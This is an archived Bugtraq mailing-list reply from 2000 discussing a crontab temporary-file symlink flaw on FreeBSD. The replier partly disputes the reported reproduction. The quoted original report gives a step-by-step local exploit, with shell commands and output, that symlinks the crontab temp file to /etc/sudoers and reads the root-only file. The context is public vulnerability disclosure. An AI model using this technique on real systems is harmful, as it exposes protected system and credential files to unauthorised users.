[17347] in bugtraq
Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file
daemon@ATHENA.MIT.EDU (Andrey Alekseyev)
Wed Oct 25 14:17:28 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: <200010251207.QAA27219@uitm.jam.zenon.net>
Date: Wed, 25 Oct 2000 16:07:23 +0400
Reply-To: Andrey Alekseyev <uitm@ZENON.NET>
From: Andrey Alekseyev <uitm@ZENON.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <39F5BF01.3AE80375@isd.memonet.ru> from Sergey Nenashev at "Oct
24, 2000 08:55:29 pm"
Well, performing a quick test I was unable to reproduce
example below with crontab that comes with FreeBSD 4.1-RELEASE.
I was only able to install files containing more than 3
characters in a line and only if these were digits.
Otherwise crontab complains about line format.
I was also able to successfully install a file with all
lines commented out with '#' (local /etc/inetd.conf).
Of course, it's possible to import /etc/crontab mode 0600.
> Hi,
>
> Tested on
> 4.0-RELEASE FreeBSD 4.0-RELEASE #9
> 4.1-RELEASE FreeBSD 4.1-RELEASE #1:
>
>
> Can read any file wich start with comment simbol (#)
>
>
>
> $ ls -l /etc/sudoers
> -r-------- 1 root wheel 313 24 oct 20:20 /etc/sudoers
> $ id
> uid=1002(alf) gid=1002(alf) groups=1002(alf)
>
>
> $ crontab -e
> ~
> ~
> ~
> /tmp/crontab.hLmjTbK417
> :!sh
>
> [ #### Make simbolik link]
> > rm /tmp/crontab.hLmjTbK417
> > ln -sf /etc/sudoers /tmp/crontab.hLmjTbK417
> > exit
>
> [ #### quit vi ]
> /tmp/crontab.hLmjTbK417
> crontab: installing new crontab
>
> [ #### start crontab editor]
>
> $ crontab -e
> [####### See in vi]
> # sudoers file.
> #
> # This file MUST be edited with the 'visudo' command as root.
> #
> # See the sudoers man page for the details on how to write a sudoers
> file.
> #
>
> # Host alias specification
>
> # User alias specification
>
> # Cmnd alias specification
>
> # User privilege specification
> root ALL=(ALL) ALL
> alf ALL=(ALL) ALL
> ~
> ~
> ~
>
>
>
>
> If file started with no # then crontab sad
>
> "/tmp/crontab.GAeNMP1357":2: bad minute
> crontab: errors in crontab file, can't install
>
>
>
>
> --
> ------
> Alf Delems<alf@isd.memonet.ru>
>
--
Andrey Alekseyev. Zenon N.S.P.
